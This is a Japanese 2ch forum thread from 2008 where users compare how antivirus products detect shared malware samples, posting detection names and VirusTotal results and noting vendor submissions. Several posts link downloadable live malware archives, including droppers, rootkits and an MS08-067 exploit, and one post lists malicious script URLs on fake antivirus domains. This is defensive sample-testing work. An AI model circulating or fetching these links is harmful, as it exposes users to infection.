ただ、マルウェアとの記載で、トロイの種類は今のところ不明。 5+追加検出1=6/6

Hello.

New malicious software was found in the attached file. Its detection will be included in the next update.
Thank you for your help.

897 :名無しさん@お腹いっぱい。:2008/11/29(土) 23:38:45
やっぱし検体送ってからの対応は相変わらずカスペが一番早いって事かな?

898 :名無しさん@お腹いっぱい。:2008/11/30(日) 01:17:12
ココは検出可否報告スレ
順位付けは荒れる原因にもなるし、スレ違いかと

899 :名無しさん@お腹いっぱい。:2008/11/30(日) 01:28:13
前から1人ウンチクたれるヤツがいるからな

900 :名無しさん@お腹いっぱい。:2008/11/30(日) 01:30:49
前からも何もずっと前からいますが?

901 :名無しさん@お腹いっぱい。:2008/11/30(日) 01:56:42
>>889
とりあえず検出率が上がりそうな「拡張ヒューリスティック保護」を最大にしてみたけど結果は変わらず
ちと残念な結果

ちなみにスルーしたものは検疫からSymantecに提出

902 :名無しさん@お腹いっぱい。:2008/11/30(日) 05:53:11
NortonはSymantec自身が更に対応速度上げないと駄目なのかも
今でも悪くはないけど
Liveupdateの定義ファイル量をもっともっと増やせばパルスアップデートも活きそう

903 :名無しさん@お腹いっぱい。:2008/11/30(日) 07:09:28
>>897
シグネチャ最強は今でもカスペってことかな?

904 :名無しさん@お腹いっぱい。:2008/11/30(日) 11:56:59
AntiVirも速い…けど日曜(土日?)は解析お休み

905 :名無しさん@お腹いっぱい。:2008/11/30(日) 13:14:48
ttp://tane.sakuratan.com/upload/upload.cgi?mode=dl&file=120
virus
>>885 の更新版+α。

906 :名無しさん@お腹いっぱい。:2008/11/30(日) 14:07:07
AntiVir 12/16
TR/Crypt.XPACK.Gen [trojan]  dldr_upk1b.exe
TR/Crypt.XPACK.Gen [trojan]  dldr_upk1a.exe
HEUR/Crypted [heuristic]     dldr_nsp2.exe
TR/Spy.Gen [trojan]        dldr1.exe
TR/Spy.Gen [trojan]        dldr0.exe
TR/Dropper.Gen [trojan]      dldr_upk2.exe
TR/Spy.Gen [trojan]        a350.exe
TR/Spy.Gen [trojan]        a1_1.exe
TR/Spy.Gen [trojan]        a1.exe
HEUR/Crypted [heuristic]    dldr_nsp1.exe
TR/Dropper.Gen [trojan]     agent0.exe
TR/Spy.Gen [trojan]        a350_1.exe

agent1〜4は提出しときました。

907 :名無しさん@お腹いっぱい。:2008/11/30(日) 14:30:20
http://www.virustotal.com/jp/analisis/047336ed0da966310c17250a6d820403
http://www.virustotal.com/jp/analisis/2e38dc7a25b9afa11f724bbab592ea90
http://www.virustotal.com/jp/analisis/c05da8c9d607a62c6a4f621ff2c4bfbc
http://www.virustotal.com/jp/analisis/78c7a2e97e112eddda4ecade4f54f6d6
http://www.virustotal.com/jp/analisis/409e5bab53b6a6b847e33779f73a156a
http://www.virustotal.com/jp/analisis/46533ced328efe1f3fb7bd5184476819
http://www.virustotal.com/jp/analisis/4d85c1ae08c9ae69eb6a94b15945d83e
http://www.virustotal.com/jp/analisis/fd9e74a871c5200ca5edebbdcff9318a
http://www.virustotal.com/jp/analisis/65249921a7df71627f0b634d14edb808
http://www.virustotal.com/jp/analisis/10df97f09905441c6b9c464611f62f3a
http://www.virustotal.com/jp/analisis/0ee63cd7d21c3ec787ba5c5a5eeb0e63
http://www.virustotal.com/jp/analisis/c9727bb9bb1192dc9180f80c523bfdc9
http://www.virustotal.com/jp/analisis/336b7b118c7a960fb5822b182abd89a0
http://www.virustotal.com/jp/analisis/efd526f7385fc85815e60f9c56e793ab
http://www.virustotal.com/jp/analisis/6050f2fae9d7213bde799c1940055bff
http://www.virustotal.com/jp/analisis/864825a05509cb5472c172623f4b869f





908 :名無しさん@お腹いっぱい。:2008/11/30(日) 14:33:22
バスターのPAK_Generic.001の件どうなったんだろう・・・
未だに検出できないと>>905は3つしか検出できないな。

909 :名無しさん@お腹いっぱい。:2008/11/30(日) 14:48:05
>>905
未対応分をMcAfeeに提出させて頂ました。

910 :名無しさん@お腹いっぱい。:2008/11/30(日) 16:56:39
>>905
d
カスペ2009 @ 15:46:00
12/16
検体提出します。

Detected Trojan program Trojan-Dropper.Win32.Agent.aabw a1.exe
Detected Trojan program Trojan-Downloader.Win32.Agent.aqny a1_1.exe
Detected Trojan program Trojan-Dropper.Win32.Agent.aabw a350.exe
Detected Trojan program Trojan-Downloader.Win32.Agent.aqny a350_1.exe
Detected Trojan program Trojan-Dropper.Win32.Agent.aabw dldr0.exe
Detected Trojan program Trojan-Downloader.Win32.Agent.aqny dldr1.exe
Detected Trojan program Trojan.Win32.ShareAll.p dldr_nsp1.exe//NSPack
Detected Trojan program Trojan.Win32.ShareAll.p dldr_nsp2.exe//NSPack
Detected Trojan program Trojan-Downloader.Win32.Small.ybw dldr_upk1a.exe//PE_Patch//UPack
Detected Trojan program Trojan-Downloader.Win32.Small.ybw dldr_upk1b.exe//PE_Patch//UPack
Detected Trojan program Trojan-Downloader.Win32.Agent.wps dldr_upk2.exe//PE_Patch//UPack
Detected virus HEUR:Trojan.Win32.Generic agent1.exe

>>831
カスペからの返事
3:privacyredeemer.exe

Hello.

No malicious software was found in the attached file.

911 :名無しさん@お腹いっぱい。:2008/11/30(日) 18:44:13
>>908
また問い合わせてみる

912 :名無しさん@お腹いっぱい。:2008/11/30(日) 18:53:20
>>905
PandaGlobalProtection2009

agent2のみスルー
ウイルス発見 : Trj/Downloader.ULG 除去 dldr_upk2.exe


それ以外は疑わしいファイルとして検出

agent2はPanda検疫に追加後Pandaに提出予定

913 :名無しさん@お腹いっぱい。:2008/11/30(日) 19:25:29
>>908
問い合わせてみた
今回はVirustotalの結果と>>905のファイルも一緒に送っといた

これでただの定型分しか来ないなら期待しないほうがいいかも

914 :名無しさん@お腹いっぱい。:2008/11/30(日) 19:55:32
テンプレ文だと思うよ。技術的なことはフィリピンのラボに聞かないとわからんし。

915 :名無しさん@お腹いっぱい。:2008/11/30(日) 21:18:50
Rising Internet Security 2009
>>885
スルー
>>905
a1.exe, a350.exe, dldr0.exe: Trojan.DL.Win32.Mnless.bqe
a1_1.exe, a350_1.exe, dldr1.exe: Trojan.DL.Win32.Mnless.bqg
dldr_nsp1.exe, dldr_nsp2.exe: Trojan.DL.Win32.VB.bag
dldr_upk1a.exe>>upack0.39, dldr_upk1b.exe>>upack0.39: Trojan.DL.Win32.Small.vtg
dldr_upk2.exe>>upack0.39: Trojan.DL.Win32.Game.a
11/16
なぜか週末は更新がこないためVirustotalより定義は古め

916 :896=910:2008/11/30(日) 22:20:48

カスペ2009 21:09:00

>>905
agent1.exeは、ヒューリスティック→シグネチャに変更
12+追加検出4=16/16

Quarantined Trojan program Trojan.Win32.KillAV.azi agent1.exe
Quarantined Trojan program Trojan-Dropper.Win32.Agent.aaox agent2.exe
Quarantined Trojan program Trojan-Dropper.Win32.Agent.aaoy agent3.exe
Quarantined Trojan program Trojan-Dropper.Win32.Agent.aaoz agent4.exe
Quarantined virus Worm.Win32.Agent.mb agent0.exe

>>896 シグネチャ記載。念のため。
Quarantined Trojan program Trojan-GameThief.Win32.Magania.ambw tane0119\unknown1.exe

917 :名無しさん@お腹いっぱい。:2008/11/30(日) 23:38:03
やっぱカスペの方がAviraに比べてマルウェア判定出してからアップデートに反映されるまで速いね。

918 :名無しさん@お腹いっぱい。:2008/12/01(月) 00:24:11
>>916
もしかして新ヒューリスティックエンジン使ってる?
もし使ってたら、感想とかがあったら教えてほしい。

私もカスペのパッカー検知は2,3回しか見たことない。

余談だが、AV-ComparativesのProActiveTestの結果(最新版)
http://www.av-comparatives.org/seiten/ergebnisse/report20.pdf

919 :名無しさん@お腹いっぱい。:2008/12/01(月) 00:41:02
>>918
んにゃ。
普通の2009 8.0.0.506CF2

新しいエミュレータ(ヒューリスティックエンジン)はまだ入れてない。近々人柱で入れる予定。

920 :名無しさん@お腹いっぱい。:2008/12/01(月) 00:47:02
>>917
Aviraは土日控えめだし
カスペに比べて、定義ファイルを配布する頻度も控えめだから
仕方がないというか、当然の結果だと思うよ

921 :918:2008/12/01(月) 01:30:52
>>919
レス感謝です。
入れたら、教えてね〜

922 :名無しさん@お腹いっぱい。:2008/12/01(月) 03:18:33
>>919
その新しいヒューリスティックエンジンってどんなの?
カスペ2009に搭載されてるものとは違うの?

923 :名無しさん@お腹いっぱい。:2008/12/01(月) 03:23:24
>>920
というか検体提出→返事という流れもカスペの方が遥かに速い
カスペの場合は1時間後に返事がきたことがある

924 :名無しさん@お腹いっぱい。:2008/12/01(月) 03:38:14
PandaGlobalProtection2009もシグネチャ検出に変更あり、しかしagent2は相変わらずスルー

ウイルス発見 : Trj/CI.A オンデマンドスキャン 除去 dldr_upk1a.exe
ウイルス発見 : Trj/CI.A オンデマンドスキャン 除去 dldr_nsp2.exe
ウイルス発見 : Trj/CI.A オンデマンドスキャン 除去 dldr_nsp1.exe
ウイルス発見 : Trj/CI.A オンデマンドスキャン 除去 dldr1.exe
ウイルス発見 : Trj/CI.A オンデマンドスキャン 除去 a350_1.exe
ウイルス発見 : Trj/CI.A オンデマンドスキャン 除去 a1_1.exe
ウイルス発見 : Trj/Downloader.ULG アンチウイルス保護 駆除 DLDR_UPK2.EXE

925 :名無しさん@お腹いっぱい。:2008/12/01(月) 07:43:19
ttp://tane.sakuratan.com/upload/upload.cgi?mode=dl&file=121
virus
>>905 の更新版+α。

926 :名無しさん@お腹いっぱい。:2008/12/01(月) 08:50:12
>>925

http://www.virustotal.com/analisis/cbbde6e9ceef88f8081e223afbfc568b
http://www.virustotal.com/analisis/cdefe15d17559b623f3e784021050bad
http://www.virustotal.com/analisis/1142a3238b50336f714a7be384a5d26e
http://www.virustotal.com/analisis/ef1c65dd37d79ef62ed32cd18dfa405d
http://www.virustotal.com/analisis/02221715a43f1fdadb3a23fc8462e694
http://www.virustotal.com/analisis/f56a4a536e658b4c736781eb67fba053
http://www.virustotal.com/analisis/54fefcb4afa93487ab8357f8e123cbb5
http://www.virustotal.com/analisis/a41f587990e39da7e201fe15f111d112
http://www.virustotal.com/analisis/59f0a490cd10d8ff96a5742a22fecafc
http://www.virustotal.com/analisis/0c7feeb7a2b96ddeb0b466ab08a01620

AVG最強すぎる
一日のアップデート回数は多いわけでもないしヒューリスティックだってAntiVirや最近のカスペと比べて強力でもないのになんでこんなに検出できるんだろ?

927 :名無しさん@お腹いっぱい。:2008/12/01(月) 09:10:09
最強とは思わんぞ

928 :名無しさん@お腹いっぱい。:2008/12/01(月) 10:19:03
>>925
検出残りAVGに提出しました。

929 :名無しさん@お腹いっぱい。:2008/12/01(月) 12:20:05
ところで、これは、MS08-067脆弱性関連?
ちょっと前のセキュニア論争を思い出す。
セキュニア「既知の脆弱性をつくウイルスをあまり検出しない」
ベンダー「パッチを当てているのが常識」

930 :名無しさん@お腹いっぱい。:2008/12/01(月) 13:54:15
そんな論争があったのか。Secunia の↓にはお世話になっ
てる。

http://secunia.com/vulnerability_scanning/personal/

詳しくない人にはオールインワンがいいんだろうねぇ…。

931 :名無しさん@お腹いっぱい。:2008/12/01(月) 15:01:26
>>929
agentなんとかはそう。序盤(0〜1あたり)で
デバッガやアンチウイルスを潰し
最終的にはrootkit(MS08-067)。

932 :名無しさん@お腹いっぱい。:2008/12/01(月) 15:57:08
>>925
PandaGlobalProtection2009

ウイルス発見 : Generic Malware オンデマンドスキャン 除去 agent0.exe
ウイルス発見 : Trj/Garmel.K オンデマンドスキャン 除去 pec2_1.exe
ウイルス発見 : Generic Trojan オンデマンドスキャン 除去 unknown1.exe
ウイルス発見 : Trj/Downloader.MDW オンデマンドスキャン 除去 upk1.exe

agent1.exeとagent2.exeは疑わしいファイルとして検出、あとはスルー
スルーしたものはPanda検疫に隔離してからPandaに提出

933 :名無しさん@お腹いっぱい。:2008/12/01(月) 16:03:30
JR北海道(jmrlmgg.cn)
ttp://tane.sakuratan.com/upload/upload.cgi?mode=dl&file=122
virus

ttp://www.virustotal.com/analisis/8819f58ee5d3a638294c5b7273d55cdf
VTでノートンとバスターがスカ、提出済み。



934 :名無しさん@お腹いっぱい。:2008/12/01(月) 16:14:02
>>925
AntiVirに提出しました

935 :名無しさん@お腹いっぱい。:2008/12/01(月) 16:17:11
>>933
PandaGlobalProtection2009

ウイルス発見 : Trj/CI.A オンデマンドスキャン 除去 jp.exe

936 :名無しさん@お腹いっぱい。:2008/12/01(月) 17:23:56
>>925
未対応分をMcAfeeに提出させて頂ました。

937 :名無しさん@お腹いっぱい。:2008/12/01(月) 17:52:04
File ID Filename Size (Byte) Result
25200727 agent0.exe 55 KB MALWARE
25200728 agent1.exe 50.41 KB MALWARE
25200729 agent2.exe 25.17 KB MALWARE
25200730 agent3.exe 21.3 KB MALWARE
25200731 agent4.exe 26.8 KB MALWARE
25200732 pec2_1.exe 16 KB MALWARE
25200733 unknown1.exe 94 KB MALWARE
25200760 upk1.exe 22.79 KB MALWARE
25200473 xrea42t.exe 68 KB MALWARE

938 :名無しさん@お腹いっぱい。:2008/12/01(月) 18:54:04
>>925
d
カスペ2009 18:11:00
8/10 (agent2.exe, agent3.exeは複数検体)

Detected Trojan program Trojan.Win32.KillAV.azk agent1.exe
Detected Trojan program Trojan-Spy.Win32.Flux.aux pec2_1.exe
Detected Trojan program Trojan-Downloader.Win32.Agent.aslr upk1.exe
Detected Trojan program Trojan-Downloader.Win32.Delf.pym unknown1.exe
Detected virus Worm.Win32.Agent.md agent0.exe
Detected virus Rootkit.Win32.Agent.fea agent2.exe
Detected virus Rootkit.Win32.Agent.fec agent2.exe
Detected virus Rootkit.Win32.Agent.feb agent2.exe
Detected virus Rootkit.Win32.Agent.fec agent3.exe
Detected virus Rootkit.Win32.Agent.feb agent3.exe
Detected virus Rootkit.Win32.Agent.fec agent4.exe

検体提出します。

939 :名無しさん@お腹いっぱい。:2008/12/01(月) 19:27:31
.>>925のxrea42.exeとxrea43tって同じファイルですか?
ハッシュも同じだし、aviraに提出しても1つにまとめられるし。

940 :名無しさん@お腹いっぱい。:2008/12/01(月) 20:29:40
Rising Internet Security 2009 21.16.18
>>861
agent0.exe: Unknown Virus
agent1.exe>>67: RootKit.Win32.Undef.zv
agent1.exe>>66: RootKit.Win32.Undef.zw
agent2.exe: RootKit.Win32.Undef.zw
agent3.exe: RootKit.Win32.Undef.zv
unknown1.exe: Unknown Virus
>>885
agent0-3.exe: Unknown Virus
>>905+>>915
agent0-3.exe: Unknown Virus
>>925
agent0.exe: Unknown Virus

941 :名無しさん@お腹いっぱい。:2008/12/01(月) 20:49:58
McAfeeやPanda、あと来年3月にトレンドマイクロに導入されるクラウド上の検出技術だけどこの3つ以外にもこの技術が導入されそうなベンダーってある?
企業規模的にはSophosならやれそうだけど

942 :名無しさん@お腹いっぱい。:2008/12/01(月) 20:53:10
>>939
ごめん、ミスった。
ttp://tane.sakuratan.com/upload/upload.cgi?mode=dl&file=123
virus

943 :名無しさん@お腹いっぱい。:2008/12/01(月) 20:53:54
>>941
正直、クラウド(笑)言いたいだけちゃうんかと。

944 :名無しさん@お腹いっぱい。:2008/12/01(月) 20:56:47
>>941
F-SecureのDeepGuard 2.0も似たような仕組みなのかな?
ttp://www.f-secure.co.jp/news/200809091/

945 :名無しさん@お腹いっぱい。:2008/12/01(月) 20:57:44
>>943
だって共通してる名称はそれしかないし・・・
ただトレンドマイクロは法人向けにしか提供しないのが残念すぎる
McAfeeとPandaがあれだけ性能良くなるんだから対応速度がそこそこ速いトレンドマイクロにも活きると思うんだけどな〜・・・

946 :名無しさん@お腹いっぱい。:2008/12/01(月) 20:59:46
>>944
情報thx
確かにF-Secure2009はこのおかげで未知のウイルス検出に強くなったみたいだね(AV-Testの結果より)

947 :名無しさん@お腹いっぱい。:2008/12/01(月) 21:04:49
ニューメディアとかマルチメディアとかユビキタスみたいな
バズワードだと思うがなぁ>クラウド

948 :名無しさん@お腹いっぱい。:2008/12/01(月) 21:15:43
>>942
PandaGlobalProtection2009もAntiVirPremiumもどっちもスルーなんでAntiVirはこれから提出する予定です(Pandaは提出しました)

949 :938:2008/12/01(月) 21:17:39
>>925
カスペからの返事
8+2=10/10

Hello,

xrea42.exe_ - Trojan.Win32.Agent.aryd
xrea42t.exe_ - Trojan.Win32.Agent.aryd

New malicious software was found in this file. It's detection will be included in the next update. Thank you for your help.

Please quote all when answering.
The answer is relevant to the latest bases from update sources.

950 :名無しさん@お腹いっぱい。:2008/12/01(月) 21:36:25
>>922
カスペ2009に付いているやつより新しいもの。
検出力がアップらしい。

951 :名無しさん@お腹いっぱい。:2008/12/01(月) 22:02:10
>>950
2009でもヒューリスティックが強力になったというのにさらに性能アップですか
これまた楽しみなものが出てきましたね

952 :名無しさん@お腹いっぱい。:2008/12/01(月) 22:21:42
25200473 xrea42.exe 68 KB MALWARE
25200889 xrea42t.exe 44 KB MALWARE

953 :名無しさん@お腹いっぱい。:2008/12/01(月) 22:51:57
>>918
そこのレポートだとF-Secureは単純にヒューリスティックのみでDeepGuardは適用されてないのかな?

じゃないとAV-Testとの差が説明つかない(AV-Testでは2008も2009もF-Secureは未知のウイルス検出に優秀だとの結果が出てる)

954 :名無しさん@お腹いっぱい。:2008/12/01(月) 23:07:58
>>953
レポート読めよ
きちんと書いてあるだろうが
馬鹿お前は

955 :名無しさん@お腹いっぱい。:2008/12/02(火) 05:47:05
ちょっと読み落としたぐらいで煽るかよ
まあでも一言入れてくれてありがと

956 :名無しさん@お腹いっぱい。:2008/12/02(火) 07:45:04
最近やたらとNOD32の調子がいいのは(このスレ的にだけど)ちょっとむかつくなw

957 :名無しさん@お腹いっぱい。:2008/12/02(火) 11:20:37
>>926の結果。
AVGよりもDrWebに驚き。以外と検出力いいんだね。

958 :名無しさん@お腹いっぱい。:2008/12/02(火) 15:50:31
さて、スレも終盤だが、テンプレの修正箇所とかない?
たとえば>>1のスクリーンショットは有名無実化してるんで撤去してもいいと思うんだが

959 :名無しさん@お腹いっぱい。:2008/12/02(火) 16:12:24
同意。

960 :名無しさん@お腹いっぱい。:2008/12/02(火) 16:49:33
ttp://tane.sakuratan.com/upload/upload.cgi?mode=dl&file=124
virus
>>925 の更新版(PackerがUPXからUpackになったので解剖していません)+α。

961 :名無しさん@お腹いっぱい。:2008/12/02(火) 16:59:48
ごめん、ファイル名に08067とか付けたけどbotくさい。

962 :名無しさん@お腹いっぱい。:2008/12/02(火) 17:10:46
>>960
Rising Internet Security 2009 21.16.18 aspk1.exe: Trojan.Win32.Undef.slh
upk1_ms08067.exe>>upack0.39: Backdoor.Win32.Undef.bqf
wow0.exe>>66: Trojan.PSW.Win32.WoWar.axn
wow1.exe: Trojan.PSW.Win32.WoWar.axn
4/4

963 :名無しさん@お腹いっぱい。:2008/12/02(火) 17:51:23
>>960
未検出分をMcAfeeに提出させて頂ました。

964 :名無しさん@お腹いっぱい。:2008/12/02(火) 18:30:34
AntiVir 4/4
TR/Downloader.Gen [trojan] tane0124\wow0.exe
TR/Downloader.Gen [trojan] tane0124\wow1.exe
TR/Dropper.Gen [trojan] tane0124\aspk1.exe
TR/Crypt.XDR.Gen [trojan] tane0124\upk1_ms08067.exe

965 :名無しさん@お腹いっぱい。:2008/12/02(火) 18:33:11
>>958
報告用のテンプレも使用されてないね・・・


966 :940:2008/12/02(火) 19:31:16
Rising Internet Security 2009 21.16.19
>>861
agent0.exe: Unknown Virus → Worm.Win32.NSDownloader.e
agent1.exe: RootKit.Win32.Undef.XX → Worm.Win32.NSDownloader.e
agent4.exe: Trojan.Win32.Undef.tjk
unknown1.exe: Unknown Virus → Trojan.Win32.Undef.tkk
3+2+1=6/6
>>885
agent0.exe: Worm.Win32.NSDownloader.f
agent1.exe>>69: Trojan.Win32.KillAV.aug
agent1.exe>>68>>upx_c: Hack.Exploit.Win32.MS08-067.l
agent1.exe>>67: RootKit.Win32.Undef.aad
agent1.exe>>66: RootKit.Win32.Undef.aac
agent2.exe: RootKit.Win32.Undef.aac
agent3.exe: RootKit.Win32.Undef.aad
agent4.exe: Hack.Exploit.Win32.MS08-067.l
unknown1.exe: Trojan.PSW.Win32.GameOL.shx
6/6
>>905
agent0-3.exe: Unknown Virus → Worm.Win32.NSDownloader.f
agent4.exe: Hack.Exploit.Win32.MS08-067.l
11+4+1=16/16
>>925
agent0.exe: Unknown Virus → Worm.Win32.NSDownloader.f
agent1-3.exe: Worm.Win32.NSDownloader.g
agent4.exe: Hack.Exploit.Win32.MS08-067.l
pec2_1.exe>>pecompact2x: Trojan.DL.Win32.Mnless.brb
unknown1.exe>>Aspack212r: Trojan.Win32.Undef.tic
1+6=7/10

967 :名無しさん@お腹いっぱい。:2008/12/02(火) 19:43:56
NOD32 Ver3.0 定義データベース3656

>>925
10/10(全検出)

>>960
3/4
wow0.exe Win32/PSW.WOW.NGG トロイの木馬
upk1_ms08067.exe Win32/TrojanDownloader.Agent.ONB トロイの木馬
aspk1.exe Win32/KernelBot.AA トロイの木馬

未検出ぶん提出済

968 :名無しさん@お腹いっぱい。:2008/12/02(火) 19:49:46
RAVがんばるな…

969 :名無しさん@お腹いっぱい。:2008/12/03(水) 00:05:03
>>960
カスペ2009 @ 23:16:00
今北産業。参考で。

4/4

Detected Trojan program Trojan-Dropper.Win32.Agent.yjl \upk1_ms08067.exe
Detected Trojan program Trojan.Win32.Agent.arsl \wow0.exe
Detected Trojan program Trojan-Downloader.Win32.Agent.anrl \aspk1.exe
Detected Trojan program Trojan-GameThief.Win32.WOW.dcy \wow1.exe

970 :名無しさん@お腹いっぱい。:2008/12/03(水) 06:24:34
>>960
PandaGlobalProtection2009

ウイルス発見 : Trj/Downloader.MDW アンチウイルス保護 駆除 UPK1_MS08067.EXE
ウイルス発見 : Generic Trojan アンチウイルス保護 駆除 WOW0.EXE
ウイルス発見 : Exploit/MS08-067 アンチウイルス保護 駆除 ASPK1.EXE

wow1.exeはヒューリスティック検出

971 :名無しさん@お腹いっぱい。:2008/12/03(水) 06:36:18
>>957
Dr.Webは他が検出できないウイルスを検出して他が揃って検出するウイルスに検出できないイメージが・・・

972 :名無しさん@お腹いっぱい。:2008/12/03(水) 07:29:34
ttp://tane.sakuratan.com/upload/upload.cgi?mode=dl&file=125
virus
今日は2つだけ。

>>971
ヒューリスティックが良くも悪くもあさっての方向に働くので
他と併用したい筆頭ではある。

973 :名無しさん@お腹いっぱい。:2008/12/03(水) 10:14:41
踏んで遊ぶ用に調べにいってきたお土産 好きに汁

ttp://bestvirusremover2008.com/etc/secure_installers.js
ttp://spywareremover2009pro.com/etc/secure_installers.js
ttp://virusremover2008plus.com/etc/secure_installers.js
ttp://powerfulvirusremover2008.com/etc/secure_installers.js

base-hrefは、それぞれの/ (./ではない)

974 :名無しさん@お腹いっぱい。:2008/12/03(水) 12:51:43
>>972
Kaspersky 7

upk1.exe トロイの木馬 Exploit.Win32.IMG-WMF.fx
upk2.exe トロイの木馬 Exploit.Win32.IMG-WMF.fr

>>973
検出しないのはKasperskyに全送り

975 :名無しさん@お腹いっぱい。:2008/12/03(水) 13:27:29
>>972
NOD32 3.0 定義バージョン3659

upk2.exe Win32/Genetikの亜種である可能性 トロイの木馬
upk1.exe Win32/Genetikの亜種である可能性 トロイの木馬.




976 :名無しさん@お腹いっぱい。:2008/12/03(水) 14:21:13
今日中に新スレ(立てれたら)立てるつもりだけれど、注文ある?
>>1-8,>>16,>>48,>>958,>>965は把握
提出先再確認よろ。

個人的には、提出したら必ずカキコしてほしいことかな。
黙って出されると、下手すると、二重提出、三重提出になって、ベンダーに負担?

977 :名無しさん@お腹いっぱい。:2008/12/03(水) 15:00:08
>>973
回収したらMcAfeeに投げる予定

978 :名無しさん@お腹いっぱい。:2008/12/03(水) 18:37:13
実行するスレを相互リンクにするかどうか、かな

979 :名無しさん@お腹いっぱい。:2008/12/03(水) 18:37:14
Rising Internet Security 2009 21.16.20 (21.06.22.00)
>>972
upk1.exe>>upack0.39: Worm.Win32.CnVampire.q
upk2.exe>>upack0.39: Worm.Win32.Agent.aag
>>973
何個か落としてみたけどほとんどTrojan.Win32.Agent.aaaa

980 :名無しさん@お腹いっぱい。:2008/12/03(水) 20:51:29
>>972
PandaGlobalProtection2009

二つともGenericMalware

981 :名無しさん@お腹いっぱい。:2008/12/03(水) 20:59:28
>>972
AntiVirPremiumも二つともTR/Crypt.XDR.Gen Trojan

982 :名無しさん@お腹いっぱい。:2008/12/03(水) 21:08:59
>>976
>個人的には、提出したら必ずカキコしてほしいことかな。
>黙って出されると、下手すると、二重提出、三重提出になって、ベンダーに負担?

おk
まだ提出してなかったら「提出してない」とも書いた方がいいんじゃないかな?
そして後々に提出したら「提出したよ」と書いた方がいいかも

983 :名無しさん@お腹いっぱい。:2008/12/03(水) 21:21:16
>>976
きっと見ないだろうけど、鑑定目的禁止なのに鑑定にやってくるやつのために、1に
http://www.virustotal.com/jp/
http://www.virscan.org/
などのスキャンサイトを載せておいてもいいと思います。


984 :名無しさん@お腹いっぱい。:2008/12/03(水) 22:04:58
基地外鑑定要求厨はFileをDLするのすらチビって出来ないので無意味

985 :名無しさん@お腹いっぱい。:2008/12/03(水) 22:21:56
>>976
>>48
それとも
>>49-50

AVGはどっち?

986 :名無しさん@お腹いっぱい。:2008/12/03(水) 23:17:07
>>985
AVGはFAQのリンクでいいと思う grisoft.comからavg.comに移動してる
http://free.avg.com/jp.5.num-1318#faq_1318

987 :名無しさん@お腹いっぱい。:2008/12/03(水) 23:21:34
>>5変更
Dr.WEB
ttp://drweb.jp/support/virus_sample.html
Kingsoft
ttp://www.kingsoft.jp/is/kentai.html
HAURI
ttp://www.haurijapan.com/support/support/virus_reg.html?menu=QTAz

988 :名無しさん@お腹いっぱい。:2008/12/03(水) 23:23:07
>>987訂正
HAURI
ttp://www.haurijapan.com/support/support/virus_reg.html

989 :名無しさん@お腹いっぱい。:2008/12/03(水) 23:31:59
@はじめに
各ウイルス対策ソフトの検出可否を独自に調査し報告するスレです。
IDが無いため検出結果を張る際はSSを必ず張ってください。
うpろだはなるべく流れにくいところにしましょう。
特定のウイルス対策ソフトを擁護、非難する書き込みはやめましょう

前スレ
【鑑定目的禁止】検出可否報告スレ7
http://pc11.2ch.net/test/read.cgi/sec/1216217642/


●専用アプロダ推奨↓
http://tane.sakuratan.com/

990 :名無しさん@お腹いっぱい。:2008/12/03(水) 23:52:56
次のスレ立てました。

【鑑定目的禁止】検出可否報告スレ8
http://pc11.2ch.net/test/read.cgi/sec/1228314831/

>>989はミスった。orz

テンプレ確認よろしく。

991 :名無しさん@お腹いっぱい。:2008/12/04(木) 01:30:25
うめ

992 :名無しさん@お腹いっぱい。:2008/12/04(木) 01:46:14


993 :名無しさん@お腹いっぱい。:2008/12/04(木) 01:47:47
ume

994 :名無しさん@お腹いっぱい。:2008/12/04(木) 01:52:56
梅茶漬け

995 :名無しさん@お腹いっぱい。:2008/12/04(木) 02:53:00
うめ〜

996 :名無しさん@お腹いっぱい。:2008/12/04(木) 02:53:42
うめ(´・ω・) ス

997 :名無しさん@お腹いっぱい。:2008/12/04(木) 03:17:45


998 :名無しさん@お腹いっぱい。:2008/12/04(木) 03:22:20
うめ

999 :名無しさん@お腹いっぱい。:2008/12/04(木) 03:26:31


1000 :名無しさん@お腹いっぱい。:2008/12/04(木) 03:28:26
1000

1001 :1001:Over 1000 Thread
このスレッドは1000を超えました。
もう書けないので、新しいスレッドを立ててくださいです。。。

316 KB
★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.02 2018/11/22 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)